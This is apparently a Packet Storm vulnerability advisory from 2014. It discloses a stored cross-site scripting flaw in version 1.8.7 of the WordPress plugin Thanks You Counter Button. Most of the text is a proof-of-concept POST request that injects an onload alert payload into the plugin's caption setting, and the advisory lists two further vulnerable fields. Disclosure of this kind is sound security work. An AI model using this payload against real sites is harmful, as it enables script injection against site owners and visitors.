WordPress Thanks You Counter Button 1.8.7 Cross Site Scripting

2014-02-25T00:00:00
ID PACKETSTORM:125397
Type packetstorm
Reporter HauntIT
Modified 2014-02-25T00:00:00

Description

                                        
                                            `# ==============================================================  
# Title ...| Thanks You Counter Button XSS  
# Version .| thanks-you-counter-button 1.8.7  
# Date ....| 23.02.2014  
# Found ...| HauntIT Blog  
# Home ....| http://www.wordpress.org/plugins/  
# ==============================================================  
  
  
# ==============================================================  
# XSS  
  
---<request>---  
POST /k/wordpress/wp-admin/options.php HTTP/1.1  
Host: 10.149.14.62  
(...)  
Content-Length: 806  
  
option_page=thankyoubutton-options&action=update&_wpnonce=ed03a9f018&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dthankyou.php&thanks_display_page=1&thanks_display_home=1&thanks_position_firstpageonly=1&thanks_position_lastpageonly=1&thanks_caption='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&thanks_style=float%3A+left%3B+margin-right%3A+10px%3B&thanks_caption_style=font-family%3A+Verdana%2C+Arial%2C+Sans-Serif%3B+font-size%3A+14px%3B+font-weight%3A+normal%3B&thanks_caption_color=%23ffffff&thanks_size=large&thanks_form=rounded&thanks_color=blue&thanks_custom_url=&thanks_custom_glow_url=&thanks_custom_width=100&thanks_custom_height=26&thanks_check_ip_address=1&thanks_time_limit%5B%5D=1&thanks_time_limit_seconds=60&thanks_display_settings_shortcuts=1&submit=Save+Changes  
---<request>---  
  
[+] Also vulnerable are: thanks_caption_style, thanks_style  
  
  
# ==============================================================  
# More @ http://HauntIT.blogspot.com  
# Thanks! ;)  
# o/   
`